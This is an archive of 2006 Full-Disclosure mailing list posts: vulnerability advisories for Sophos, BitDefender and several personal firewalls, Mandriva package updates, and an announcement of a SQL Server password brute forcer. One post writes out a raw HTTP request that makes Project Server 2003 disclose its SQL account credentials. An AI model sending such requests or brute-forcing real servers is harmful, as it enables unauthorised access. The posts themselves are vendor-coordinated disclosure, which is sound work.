This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sophos Anti-Virus.

The specific flaw exists in the parsing of SIT archives. When a long
non-null terminated filename is processed by veex.dll, a heap overflow
occurs due to the miscalculation of the string's actual size.
Exploitation is possible leading to remote code execution running under
the SYSTEM context.


-- Vendor Response:
Sophos has issued an update to correct this vulnerability. More details
can be found at:

    http://www.sophos.com/support/knowledgebase/article/21637.html

-- Disclosure Timeline:
2006.09.14 - Vulnerability reported to vendor
2006.12.12 - Digital Vaccine released to TippingPoint customers
2006.12.12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From peter at bank-connect.com  Fri Dec 15 08:31:50 2006
From: peter at bank-connect.com (Peter van den Heuvel)
Date: Fri, 15 Dec 2006 09:31:50 +0100
Subject: [Full-disclosure] [Fwd: MOST URGENT]
References: <4580825F.1050808@agent.co.il>	<200612141346.kBEDk3oQ021863@turing-police.cc.vt.edu>
	
Message-ID: <45825D76.3050708@bank-connect.com>

  > > recently died of Colonium-210 poisoning under mysterious
  > > circumstances".

 > Colonium my arse!

Well, Colonium-210, maybe something like Chanel-5. Is for the cheeks
too, though you're talking about the other cheeks...

Peter




From brett.moore at security-assessment.com  Thu Dec 14 23:09:05 2006
From: brett.moore at security-assessment.com (Brett Moore)
Date: Fri, 15 Dec 2006 12:09:05 +1300
Subject: [Full-disclosure] Project Server 2003 - Credential Disclosure
Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DEA41@pukeko.smb2go.net>

==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore at security-assessment.com
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=



1




0
0
theuser


0
{SQLServer}
ProjectServer
SERVER
1
resglobal
MSProjectUser              <----
sekretpass                 <----
SERVER\USER


--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==============================================================
% 
==============================================================



From joxeankoret at yahoo.es  Thu Dec 14 22:42:26 2006
From: joxeankoret at yahoo.es (Joxean Koret)
Date: Thu, 14 Dec 2006 23:42:26 +0100
Subject: [Full-disclosure] Fuzzers and brute forcers
Message-ID: <1166136147.13885.7.camel@localhost.localdomain>

Hi to all,

Attached goes various tools I wrote.

? A password brute forcer for MS SQL Server/Sybase. It's a dictionary
based one. Small size dictionary (23401 passwords) included. You only
need a valid Python installation; no need for MS SQL Server/Sybase
client libraries.

? A simple FTP fuzzing tool (Python).

? A MS SQL Server/Sybase stored procedures fuzzing tool. Python 2.4 and
pymssql ARE required.

Licensed under the GPL. May be interesting for someone else...

---
Joxean Koret

-- 
-----------------------------------
Agian, agian, eg?n batez
jeikiko dira egiazko Ziberotarrak,
egiazko e?skald?nak,
tirano arrotzen hiltzeko 
eta gure aiten aitek ?tzi daikien 
lurraren pop?liari erremetitzeko.
-----------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: tools.tar.gz
Type: application/x-compressed-tar
Size: 76406 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/13d76407/attachment.bin 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
	digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/13d76407/attachment-0001.bin 

From pdp.gnucitizen at googlemail.com  Fri Dec 15 05:14:59 2006
From: pdp.gnucitizen at googlemail.com (pdp (architect))
Date: Fri, 15 Dec 2006 13:14:59 +0800
Subject: [Full-disclosure] Backdooring Image Files - security notice
Message-ID: <6905b1570612142114m5b078aa4wecb025d6e4c14ba1@mail.gmail.com>

I will be brief. There is a rather lame/concerning technique, most of
you know about, that allows JavaScript to be executed upon visiting an
image file. This issue is not due to some browser error, although
clearly IE has some issues with it, but it is due to web applications
not sanitizing user supplied content in a form of links.

I will skip the rest for those who are not interested in this topic.
Those who are interested can check this post:
http://www.gnucitizen.org/blog/backdooring-images

BIDs worth checking out:
* http://www.securityfocus.com/bid/3693
* http://www.securityfocus.com/bid/3116

This technique, although not as robust as the QuickTime flow, can be
used to write worms for Bulletin Boards, Blogs, Wikis and other types
of web systems. I conducted a small survey, which I am not going to
disclose, showing quite concerning figures.

Has anyone experienced these types of worms yet?

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



From security at nruns.com  Fri Dec 15 15:01:30 2006
From: security at nruns.com (security at nruns.com)
Date: Fri, 15 Dec 2006 16:01:30 +0100
Subject: [Full-disclosure] BitDefender AV Packed PE File Parsing Engine Heap
	Overflow
Message-ID: 

n.runs AG					   
http://www.nruns.com/			              security at nruns.com
n.runs-SA-2006.003                                           15-Dec-2006
________________________________________________________________________

Vendor:	               BitDefender, http://www.bitdefender.com
Affected Products:
			BitDefender Antivirus, 
			BitDefender Antivirus Plus, 
			BitDefender Internet Security, 
			BitDefender Mail Protection for Enterprises, 
			BitDefender Online Scanner, 
			BitDefender for ISA Server, 
			BitDefender for MS Exchange 2000, 
			BitDefender for MS Exchange 2003, 
			BitDefender for MS Exchange 5.5
Platforms:
			Fedora, 
			FreeBSD, 
			Mandrake, 
			Red Hat, 
			SUSE, 
			Slackware, 
			Windows 2000, 
			Windows 2003, 
			Windows 98, 
			Windows Me, 
			Windows NT, 
			Windows XP

Vulnerability:         Arbitrary Code Execution (remote) 

________________________________________________________________________

Vendor communication:

  2006/08/24		initial notification of BitDefender 
  2006/08/25		BitDefender Response
  2006/08/26		PGP keys exchange
  2006/08/28		PoC files sent to BitDefender
  2006/08/29		BitDefender confirmed the bug and fixed it.
  2006/08/30		BitDefender released fixes through automatic update.
________________________________________________________________________

Overview:
 
BitDefenderT provides security solutions to satisfy the protection
requirements of today's computing environment, delivering effective threat
management to over 41 million home and corporate users in more than 200
countries.
BitDefender has garnered many awards, accolades and certifications since its
inception in 2001. From the prestigious European IST Prize, to the #1 Best
Buy ranking from PC World, and most recently, the PC World "Best 100
Products of 2006," the Company is enjoying worldwide recognition for its
superior technology and product offering.



Description:
A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Heap Overflow through Integer Overflow in Packed PE File Parsing

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability.

Solution:
The vulnerabilities were reported on August 28 and an update has been issued
on August 29 to solve this vulnerability. The update has been delivered
immediately to all BitDefender users through the regular automatic update
mechanism, so no user action is required.

Note: We would like to thank BitDefender, who were available even during the
weekend to fix the problem, for their quick response. 

________________________________________________________________________

Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 

________________________________________________________________________

References: 
http://www.bitdefender.com/KB323-en--cevakrnl.xmd-vulnerability.html

________________________________________________________________________

The information provided is released by n.runs "as is" without warranty of
any kind. n.runs disclaims all warranties, either express or implied, expect
for the warranties of merchantability. In no eventshall n.runs be liable for
any damages whatsever including direct, indirect, incidental, consequential,
loss of business profits or special damages, even if n.runs has been advised
of the possibility of such damages.
Distribution or Reproduction of the information is provided that the
advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.



From research at matousec.com  Fri Dec 15 18:43:16 2006
From: research at matousec.com (Matousec - Transparent security Research)
Date: Fri, 15 Dec 2006 19:43:16 +0100
Subject: [Full-disclosure] Bypassing process identification of several
 personal firewalls and HIPS
Message-ID: <4582ECC4.8000501@matousec.com>

Hello,

We would like to inform you about a vulnerability in several personal firewalls and HIPS:


Description:

Personal firewalls, HIPS and similar security software that implement per process security have to be able to identify 
the process that attempts to execute privileged action. Usually, not only the name and the process identifier but also 
the full path of such process or other informations are required. Some security software in this area obtain these 
informations improperly from user mode structures of the unknown process. This means that such security software relies 
on user mode data that can be modified by the malicious applications. It is possible to modify these data such that the 
malicious process appears to be another (e.g. trusted) process. Vulnerable security software then allows executing 
privileged actions to the malicious application.


Vulnerable software:

     * AntiHook 3.0.0.23 - Desktop
     * AVG Anti-Virus plus Firewall 7.5.431
     * Comodo Personal Firewall 2.3.6.81
     * Filseclab Personal Firewall 3.0.0.8686
     * Look 'n' Stop 2.05p2
     * Sygate Personal Firewall 5.6.2808
     * probably older versions of above mentioned products
     * possibly other personal firewalls and HIPS software


More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Bypassing-process-identification-serveral-personal-firewalls-HIPS.php


Regards,

-- 
Matousec - Transparent security Research
http://www.matousec.com/



From david.kierznowski at gmail.com  Fri Dec 15 20:56:11 2006
From: david.kierznowski at gmail.com (David Kierznowski)
Date: Fri, 15 Dec 2006 20:56:11 +0000
Subject: [Full-disclosure] Hacking HomePlug Networks
Message-ID: 

"HomePlug specification products also protect data by utilizing
powerful DES encryption, which makes hacking into a HomePlug network
virtually impossible."

I spent an amusing hour looking into this.

Details at:
http://michaeldaw.org/md-hacks/hacking_homeplugs/



From security at mandriva.com  Fri Dec 15 21:36:55 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 14:36:55 -0700
Subject: [Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix
	heap buffer overflow vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:220
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : libgsf
 Date    : November 30, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 "infamous41md" discovered a heap buffer overflow vulnerability in
 libgsf, a GNOME library for reading and writing structured file
 formats, which could lead to the execution of arbitrary code.

 The updated packages have been patched to correct this problem.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4514
 http://www.debian.org/security/2006/dsa-1221
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 e2a8d38173f4d4eaf630779b212b9ecf  2007.0/i586/libgsf-1_114-1.14.1-2.1mdv2007.0.i586.rpm
 0874198afe21dd57b297614d0451416c  2007.0/i586/libgsf-1_114-devel-1.14.1-2.1mdv2007.0.i586.rpm
 5d46cfd87b088be65ac564b4208d3780  2007.0/i586/libgsf-1.14.1-2.1mdv2007.0.i586.rpm 
 029b6965cd0d3c6ea198e9ac601fb972  2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 003d7db8087dc2e8b1773011e6d4847a  2007.0/x86_64/lib64gsf-1_114-1.14.1-2.1mdv2007.0.x86_64.rpm
 583a7f1fdd9b0c92b2ff6d64b18b08b4  2007.0/x86_64/lib64gsf-1_114-devel-1.14.1-2.1mdv2007.0.x86_64.rpm
 1e676f26116db9f4a392d2719db228d5  2007.0/x86_64/libgsf-1.14.1-2.1mdv2007.0.x86_64.rpm 
 029b6965cd0d3c6ea198e9ac601fb972  2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm

 Corporate 3.0:
 c059f972836144253da330f8db5387a3  corporate/3.0/i586/libgsf-1_1-1.8.2-1.1.C30mdk.i586.rpm
 9f9fd3e74c9ec2ee6a79937d4740321c  corporate/3.0/i586/libgsf-1_1-devel-1.8.2-1.1.C30mdk.i586.rpm 
 36f8c30001d414877e819c439143a696  corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1a2bef3524a009d553419b159d80f781  corporate/3.0/x86_64/lib64gsf-1_1-1.8.2-1.1.C30mdk.x86_64.rpm
 f2e48664350fd62e2b12dc77abe11a46  corporate/3.0/x86_64/lib64gsf-1_1-devel-1.8.2-1.1.C30mdk.x86_64.rpm 
 36f8c30001d414877e819c439143a696  corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFeVjlmqjQ0CJFipgRAk1UAJ0cyKR4wc+ugK6c/npq5JWbI51sCQCdF77e
x8dvBLpli85NDP7u30jsabg=
=o610
-----END PGP SIGNATURE-----



From security at mandriva.com  Fri Dec 15 21:39:02 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 14:39:02 -0700
Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages
	fix multiple vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:206
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mozilla-thunderbird
 Date    : November 9, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 0a2828dbab70a2be0e721cc016f93d7f  2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 defa2ac291c66f693946362bd2501c40  2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
 c5540aa8289eefbf3e708e442de77aa8  2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 45da9968c4661ef994ef1dcefd0ad54f  2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
 df8d2ea1013a65457aa1f2100060d968  2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 f87f2441b2ca36d4f5c3f3f2dd04b3bb  2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 bc3a281fbc5c09b7f962dfb1d3b9e517  2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 2563050985477697472069d08e96de0f  2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
 e22be985ae58ab3eba5b90aa6a3eb58e  2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
 fde0d1b9c4feee3c1e239345f4065090  2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
 10be2386887a6c70bc4f9c0453b33072  2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 1c92d5ee79fc52ec1525f3c96dfa1916  2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 42e6ddb4a33a297c71b996bf651a4d69  2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 96394d1245284a886b954bb063c0ab5b  2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 8386317130e064260bd8b114616410ed  2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 eb622e8adc0767e090a608e80a1611b7  2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 3ca6736aaf725851a0be21f0490aeb20  2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 47b16b8c45acc936b62051594ed87c69  2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 c2e742162882c52761040025ff4ddfff  2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 072c5224bd49a45ba7ab0a57f657ec6e  2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
 3393e810730d305adc4fe8ecc98b782a  2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 70882501b0fc01a56cee67c2b7c63ac5  2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 47aa8c7af46ee44f1b51e0f44772beeb  2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e284b46733e04ab96cccb612de04e5a8  2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e73efd093c48aa82d6f73025f1ade443  2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ed790bdd1a45343b427925765f5f2b5c  2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 61690a97ef04b6083693ffe4a9ab3176  2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 889574eda89385739aad6eda7f3d2604  2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ef9b59cdd619da74737b5e91e4067386  2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e20a88ece32f8ee81aaedd828558d880  2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 250f6f86984922da278774d480ba37a7  2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f683dba38c9055cbac36f8468e357ebf  2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6594d0bb3f7770f168728827c1cf9f83  2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1ee011c3c94c7b081f53b9a55996da0c  2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be24dd32e628b8294c1b87d200cf02dd  2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 020acf8e510080a701c6278c6eb862ae  2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 af4c92e4f3eaf833111572ead14c8c04  2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7483c3a55198fcbc9be2c9750919a370  2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 753acdb58e6400659dab48ff78f371e7  2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 fb83f542bd12edda5e85d9873a08a938  2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 996bbfb13654cfc2180036ea6b1e61df  2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ff6217b99ab96a1444b6a758bf184ecf  2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f15d9f053011068deba71fdc05dc6d46  2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 98f63b0dedef781ec16f8bebb6a032cb  2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e5e42bb849d26a4f59fb6204d6ed9850  2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8bc9d56d4778baf40b115eb805a506b3  2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 21c7d7ffd14a724e4ce9d96e99d0f3c7  2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9b115831c8ae36d7141c93a9d867d445  2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 d6efb3cdaba13c17dd31147011796614  2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4239765036a0bffaa4fcff9fb076a221  2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be87cc456600cb0dc18730ae3f75af92  2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 459367e42865a1de4374d2a9b8c36232  2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e1b30720806b2c6ab650251f9756127  2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 70c5525bea63d291374706abfb4523c4  2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4addf81f6fdb0fe55d2274ba726d066e  2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9c9a1e6a7623a712f40666e77fd3f2b4  2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9cd9d0509bbe4d0bc7c092118253c237  2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 b23236fc11caa38b1354893f1e9863e1  2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c5b898d7f04c26a34bb4223ee4547586  2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
